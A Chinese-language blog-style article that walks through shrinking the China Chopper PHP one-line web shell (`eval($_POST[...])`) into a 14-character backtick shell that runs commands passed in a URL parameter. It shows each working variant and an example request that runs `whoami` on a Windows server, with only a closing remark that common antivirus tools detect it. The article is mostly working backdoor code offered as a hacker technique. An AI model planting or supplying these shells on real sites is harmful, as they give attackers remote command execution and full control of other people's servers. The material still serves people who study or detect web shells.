黑客用14个字符就能控制你的网站和服务器

php的语言是很强大的，比强大更重要的是它的灵活性。由于它的灵活性，所以大量的php一句话web后门及变种在市面上比比皆是。最出名的莫过于桂林老兵写的菜刀软件里的一句话了。说句题外话，桂林老兵以前还是我同事的。

菜刀软件里自带的php一句话源码是：

<?php @eval($_POST['chopper']);?>

这个菜刀一句话很强大，几乎没有它做不了的事，文件修改、上传下载、数据库操作、执行命令等等，类似一个文件管理器一样的后门。抓个图你看下吧。

我们来数一下，带空格来算总共是34个字符。今天我们来改造一下，让其缩到最短。

第一步改造：php如果支持短标签的话，可以去掉“?”后边的php，所以可以改成：

<? @eval($_POST['chopper']);?>

变成了31个字符。

第二步改造：php文件中最后一行可以去掉“?>”，所以可以改成：

<? @eval($_POST['chopper']);

变成了29个字符。

第三步改造：把php代码中的容错符“@”去掉，并且把$_POST换成$_GET，代码变成了

<? eval($_GET['chopper']);

变成了27个字符。

第四步改造：把后门中的连接密码chopper，换成数字1，代码变成了

<? eval($_GET['1']);

变成了21个字符。

第五步改造：这个没法在形式上缩短了，只能改变其功能，让这个后门只保留一个功能。后门中最重要的功能是什么？当然是执行命令。如果php网站没有在php.ini做任何限制的话，哪么可以用Backticks来执行命令，就是用重音符来执行命令，所以我们最终的代码是去掉了eval，加上“`”，变成了下边的样子：

<? `$_GET[1]`;

带空格的话，只有14个字符。不带空格的话，是13个。13个数字是不是会让你想起犹大和黑色期五呢？好像是冥冥之中注定，最短是13个字母。剩哪个空格，是可怕的第13个人？

这个后门如何用呢？它只能执行命令，并没有回显。而且我们只用浏览器就能用。假如这个后门名叫1.php，哪么来执行一下。

//192.168.1.100/1.php?1=whoami > d:.txt

我是在windows服务器上执行的。linux服务器你相应的命令和路径也要改一下了。如果能执行命令的话，剩下的什么事你做不了呢？但是现在服务器一般都有360、安全狗之类的防护软件，所以这个php一句话在查杀之列，你也不用太担心。